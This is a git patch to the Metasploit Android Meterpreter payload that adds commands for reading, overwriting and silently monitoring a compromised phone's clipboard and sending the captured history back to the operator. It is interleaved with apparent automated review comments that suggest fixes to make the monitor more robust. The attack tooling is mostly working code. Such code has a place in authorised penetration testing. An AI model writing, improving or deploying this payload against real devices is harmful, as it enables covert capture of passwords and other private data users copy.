From febbb1693345912ea5ae827842c55f8d05f6d143 Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 21:32:56 +0100 Subject: [PATCH] clipboard_monitor basically working --- .../meterpreter/AndroidMeterpreter.java | 24 +++++ .../metasploit/meterpreter/ClipManager.java | 101 ++++++++++++++++++ .../android/clipboard_get_data.java | 31 ++++++ .../android/clipboard_monitor_dump.java | 23 ++++ .../android/clipboard_monitor_pause.java | 23 ++++ .../android/clipboard_monitor_purge.java | 23 ++++ .../android/clipboard_monitor_resume.java | 23 ++++ .../android/clipboard_monitor_start.java | 24 +++++ .../android/clipboard_monitor_stop.java | 24 +++++ .../android/clipboard_set_data.java | 25 +++++ .../com/metasploit/meterpreter/TLVType.java | 8 ++ 11 files changed, 329 insertions(+) create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/ClipManager.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_get_data.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_dump.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_pause.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_purge.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_resume.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_start.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_stop.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_set_data.java 
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java index 57de481e..838be18e 100644 --- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java @@ -6,6 +6,14 @@ import android.os.Looper; import com.metasploit.meterpreter.android.activity_start_android; import com.metasploit.meterpreter.android.check_root_android; +import com.metasploit.meterpreter.android.clipboard_get_data; +import com.metasploit.meterpreter.android.clipboard_monitor_dump; +import com.metasploit.meterpreter.android.clipboard_monitor_pause; +import com.metasploit.meterpreter.android.clipboard_monitor_purge; +import com.metasploit.meterpreter.android.clipboard_monitor_resume; +import com.metasploit.meterpreter.android.clipboard_monitor_start; +import com.metasploit.meterpreter.android.clipboard_monitor_stop; +import com.metasploit.meterpreter.android.clipboard_set_data; import com.metasploit.meterpreter.android.dump_calllog_android; import com.metasploit.meterpreter.android.dump_contacts_android; import com.metasploit.meterpreter.android.dump_sms_android; @@ -59,6 +67,7 @@ public class AndroidMeterpreter extends Meterpreter { private static Context context; private final IntervalCollectionManager intervalCollectionManager; + private ClipManager clipManager; private void findContext() throws Exception { Class activityThreadClass; @@ -97,6 +106,13 @@ public class AndroidMeterpreter extends Meterpreter { return this.intervalCollectionManager; } + public synchronized ClipManager getClipManager() { + if (clipManager == null) { + clipManager = ClipManager.create(context); + } + return clipManager; + } + public static Context getContext() { return context; } 
@@ -167,6 +183,14 @@ public class AndroidMeterpreter extends Meterpreter {
 mgr.registerCommand("set_audio_mode", set_audio_mode_android.class);
 mgr.registerCommand("sqlite_query", sqlite_query_android.class);
 mgr.registerCommand("set_wallpaper", set_wallpaper_android.class);
+ mgr.registerCommand("extapi_clipboard_get_data", clipboard_get_data.class);
+ mgr.registerCommand("extapi_clipboard_set_data", clipboard_set_data.class);
+ mgr.registerCommand("extapi_clipboard_monitor_dump", clipboard_monitor_dump.class);
+ mgr.registerCommand("extapi_clipboard_monitor_pause", clipboard_monitor_pause.class);
+ mgr.registerCommand("extapi_clipboard_monitor_purge", clipboard_monitor_purge.class);
+ mgr.registerCommand("extapi_clipboard_monitor_resume", clipboard_monitor_resume.class);
+ mgr.registerCommand("extapi_clipboard_monitor_start", clipboard_monitor_start.class);
+ mgr.registerCommand("extapi_clipboard_monitor_stop", clipboard_monitor_stop.class);
 }
 return getCommandManager().getNewCommands();
 }
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/ClipManager.java b/java/androidpayload/library/src/com/metasploit/meterpreter/ClipManager.java
new file mode 100644
index 00000000..eb843f66
--- /dev/null
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/ClipManager.java
@@ -0,0 +1,101 @@
+package com.metasploit.meterpreter;
+
+import android.content.ClipData;
+import android.content.ClipboardManager;
+import android.content.Context;
+import android.os.Build;
+import android.os.Handler;
+import android.os.Looper;
+import android.text.format.DateFormat;
+
+import java.io.IOException;
+import java.util.Date;
+import java.util.LinkedList;
+import java.util.List;
+
+public class ClipManager implements ClipboardManager.OnPrimaryClipChangedListener {
+
+ private final Object waiter = new Object();
+
+ private final Context context;
+ private ClipboardManager clipboardManager;
+ private final List clipboardHistory = new LinkedList();
+ private class ClipEntry {
+ long timestamp;
+ String text;
+ }
+
+ private ClipManager(Context contextInput) {
+ this.context = contextInput;
+ // Switch to the UI thread to get the ClipboardManager
+ final Handler handler = new Handler(Looper.getMainLooper());
+ handler.post(new Runnable() {
+ public void run() {
+ synchronized (waiter) {
+ clipboardManager = (ClipboardManager) context.getSystemService(Context.CLIPBOARD_SERVICE);
+ waiter.notify();
+ }
+ }
+ });
+ synchronized (waiter) {
+ try {
+ if (clipboardManager == null) {
+ waiter.wait(100);
+ }
+ } catch (InterruptedException e) {
+ e.printStackTrace();
+ }
+ }
+ }
+
+ public static ClipManager create(Context context) {
+ if (Build.VERSION.SDK_INT < Build.VERSION_CODES.HONEYCOMB) {
+ return null;
+ }
+ return new ClipManager(context);
+ }
+
+
+ public void setText(String text) {
+ clipboardManager.setPrimaryClip(ClipData.newPlainText("", text));
+ }
+
+ public String getText() {
+ if (!clipboardManager.hasPrimaryClip()) {
+ return "(null - clipboard was cleared)";
+ }
+
+ ClipData primaryClip = clipboardManager.getPrimaryClip();
+ ClipData.Item item = primaryClip.getItemAt(0);
+ return item.coerceToText(context).toString();
+ }
+
+ public void stop() {
+ clipboardManager.removePrimaryClipChangedListener(this);
+ }
+
+ public void start() {
+ clipboardManager.addPrimaryClipChangedListener(this);
+ }
+
+ @Override
+ public void onPrimaryClipChanged() {
+ ClipEntry clipEntry = new ClipEntry();
+ clipEntry.timestamp = System.currentTimeMillis();
+ clipEntry.text = getText();
+ clipboardHistory.add(clipEntry);
+ }
+
+ public void purge() {
+ clipboardHistory.clear();
+ }
+
+ public void dump(TLVPacket response) throws IOException {
+ for (ClipEntry clipText : clipboardHistory) {
+ TLVPacket pckt = new TLVPacket();
+ pckt.addOverflow(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP, new Date(clipText.timestamp).toString());
+ pckt.addOverflow(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, clipText.text);
+ response.addOverflow(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT, pckt);
+ }
+ }
+}
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_get_data.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_get_data.java
new file mode 100644
index 00000000..edf9372a
--- /dev/null
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_get_data.java
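Review bot: The ClipManager constructor waits only once, `waiter.wait(100)` under an `if`, so a timeout or spurious wakeup leaves `clipboardManager` null while `create()` still returns the instance; `setText`, `getText`, `start` and `stop` then dereference null. The wait should loop on the condition with a deadline and restore the interrupt flag instead of only calling `e.printStackTrace()`. `create()` should return null when the service was not obtained, so the null check the command classes already perform covers this case. Separately, `clipboardHistory` is appended to in `onPrimaryClipChanged()` and iterated or cleared in `dump()`/`purge()` with no lock; if the callback arrives on the main looper (as the constructor comment suggests) while commands run on another thread, those three accesses should share a `synchronized (clipboardHistory)` block.

```java
private ClipManager(Context contextInput) {
    // … unchanged: context assignment and handler.post(...) that sets clipboardManager …
    synchronized (waiter) {
        final long deadline = System.currentTimeMillis() + 100;
        long remaining = 100;
        try {
            // wait() can return on timeout or spuriously, so re-check the field each time.
            while (clipboardManager == null && remaining > 0) {
                waiter.wait(remaining);
                remaining = deadline - System.currentTimeMillis();
            }
        } catch (InterruptedException e) {
            // Keep the interrupt visible to the caller.
            Thread.currentThread().interrupt();
        }
    }
}

public static ClipManager create(Context context) {
    // … unchanged: HONEYCOMB version check …
    ClipManager manager = new ClipManager(context);
    synchronized (manager.waiter) {
        // Same failure signal as the version check: callers already test for null.
        return manager.clipboardManager != null ? manager : null;
    }
}
```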
@@ -0,0 +1,31 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.ClipManager;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+public class clipboard_get_data implements Command {
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception {
+ AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter;
+ ClipManager clipManager = androidMeterpreter.getClipManager();
+ if (clipManager == null) {
+ return ERROR_FAILURE;
+ }
+
+ String text = clipManager.getText();
+ if (text != null) {
+ TLVPacket pckt = new TLVPacket();
+ pckt.add(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, text);
+ response.addOverflow(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT, pckt);
+ }
+ return ERROR_SUCCESS;
+
+ }
+}
+
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_dump.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_dump.java
new file mode 100644
index 00000000..c0cf55c5
--- /dev/null
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_dump.java
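Review bot: The `if (text != null)` guard in `clipboard_get_data.execute` never fails as written, because `ClipManager.getText()` returns the literal `"(null - clipboard was cleared)"` for an empty clipboard and otherwise calls `toString()` on the coerced text. The placeholder is therefore sent in `TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT` as if it were clipboard content, and the receiver cannot tell it apart from a user who copied that exact string. Returning null from `getText()` for the empty case, `if (!clipboardManager.hasPrimaryClip()) { return null; }`, would make this guard meaningful; `onPrimaryClipChanged()` would then have to decide how to record a cleared clipboard. This hunk also uses `pckt.add(...)` where `ClipManager.dump()` uses `pckt.addOverflow(...)` for the same TLV type; a one-line comment on why they differ would help.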
@@ -0,0 +1,23 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.ClipManager;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+public class clipboard_monitor_dump implements Command {
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+ AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter;
+ ClipManager clipManager = androidMeterpreter.getClipManager();
+ if (clipManager == null) {
+ return ERROR_FAILURE;
+ }
+ clipManager.dump(response);
+ return ERROR_SUCCESS;
+ }
+}
+
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_pause.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_pause.java
new file mode 100644
index 00000000..5f738714
--- /dev/null
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_pause.java
@@ -0,0 +1,23 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.ClipManager;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+public class clipboard_monitor_pause implements Command {
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception {
+ AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter;
+ ClipManager clipManager = androidMeterpreter.getClipManager();
+ if (clipManager == null) {
+ return ERROR_FAILURE;
+ }
+ clipManager.stop();
+ return ERROR_SUCCESS;
+ }
+}
+
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_purge.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_purge.java
new file mode 100644
index 00000000..2fef19cc
--- /dev/null
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_purge.java
@@ -0,0 +1,23 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.ClipManager;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+public class clipboard_monitor_purge implements Command {
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception {
+ AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter;
+ ClipManager clipManager = androidMeterpreter.getClipManager();
+ if (clipManager == null) {
+ return ERROR_FAILURE;
+ }
+ clipManager.purge();
+ return ERROR_SUCCESS;
+ }
+}
+
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_resume.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_resume.java
new file mode 100644
index 00000000..b9c4b1f0
--- /dev/null
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_resume.java
@@ -0,0 +1,23 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.ClipManager;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+public class clipboard_monitor_resume implements Command {
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception {
+ AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter;
+ ClipManager clipManager = androidMeterpreter.getClipManager();
+ if (clipManager == null) {
+ return ERROR_FAILURE;
+ }
+ clipManager.start();
+ return ERROR_SUCCESS;
+ }
+}
+
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_start.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_start.java
new file mode 100644
index 00000000..c181240b
--- /dev/null
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_start.java
@@ -0,0 +1,24 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.ClipManager;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+public class clipboard_monitor_start implements Command {
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception {
+ AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter;
+ ClipManager clipManager = androidMeterpreter.getClipManager();
+ if (clipManager == null) {
+ return ERROR_FAILURE;
+ }
+ clipManager.purge();
+ clipManager.start();
+ return ERROR_SUCCESS;
+ }
+}
+
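Review bot: `clipboard_monitor_resume` calls `clipManager.start()` without knowing whether monitoring is already active, and `clipboard_monitor_start` in the next hunk does the same after `purge()`; `ClipManager.start()` passes `this` straight to `addPrimaryClipChangedListener`. If the platform keeps listeners in a plain list (not visible here, to be confirmed), a second start or a resume without a preceding pause registers the listener twice. Every clipboard change is then recorded twice, and a single `stop()` removes only one registration. A `private boolean monitoring` flag in `ClipManager`, tested in `start()` and cleared in `stop()`, would make both commands idempotent.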
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_stop.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_stop.java
new file mode 100644
index 00000000..d8d3f964
--- /dev/null
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_stop.java
@@ -0,0 +1,24 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.ClipManager;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+public class clipboard_monitor_stop implements Command {
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception {
+ AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter;
+ ClipManager clipManager = androidMeterpreter.getClipManager();
+ if (clipManager == null) {
+ return ERROR_FAILURE;
+ }
+ clipManager.stop();
+ clipManager.dump(response);
+ return ERROR_SUCCESS;
+ }
+}
+
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_set_data.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_set_data.java
new file mode 100644
index 00000000..92633522
--- /dev/null
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_set_data.java
@@ -0,0 +1,25 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.ClipManager;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+import com.metasploit.stage.PayloadTrustManager;
+
+public class clipboard_set_data implements Command {
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception {
+ AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter;
+ ClipManager clipManager = androidMeterpreter.getClipManager();
+ if (clipManager == null) {
+ return ERROR_FAILURE;
+ }
+ clipManager.setText(request.getStringValue(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT));
+ return ERROR_SUCCESS;
+ }
+}
+
diff --git a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
index 14516e73..a972b19c 100644
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
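Review bot: The import `com.metasploit.stage.PayloadTrustManager` is not used anywhere in `clipboard_set_data`; dropping it removes a needless dependency of this command on the stager package. `ClipManager.java` in the same patch likewise imports `android.text.format.DateFormat` without using it. The result of `request.getStringValue(...)` is passed to `setText` unchecked; whether it can be null when the TLV is absent is not visible in this hunk, so a short comment stating the expected behaviour would help the next reader.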
@@ -196,4 +196,12 @@ public interface TLVType {
 public static final int TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER = TLVPacket.TLV_META_TYPE_STRING | 3010;
 public static final int TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH = TLVPacket.TLV_META_TYPE_UINT | 3011;
 public static final int TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER = TLVPacket.TLV_META_TYPE_STRING | 3012;
+
+ int TLV_TYPE_EXTENSION_EXTAPI = 0;
+ int TLV_EXTENSIONS = 20000;
+ int TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD = TLVPacket.TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35);
+ int TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP = TLVPacket.TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 38);
+ int TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT = TLVPacket.TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 39);
+ int TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT = TLVPacket.TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 40);
+
 }
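Review bot: The six new constants are declared as bare `int NAME = …;` while every existing line in the hunk spells out `public static final int`; inside an interface the modifiers are implied, but the mixed style reads as if the new fields were different in kind. The numeric ids (`20000` plus `35`, `38`, `39`, `40`) presumably have to match the extapi definitions on the other side of the protocol, so a comment above them such as `// Must stay in sync with the extapi clipboard TLV ids used by the framework` would document where the numbers come from. `TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD` is not referenced by any file in this patch.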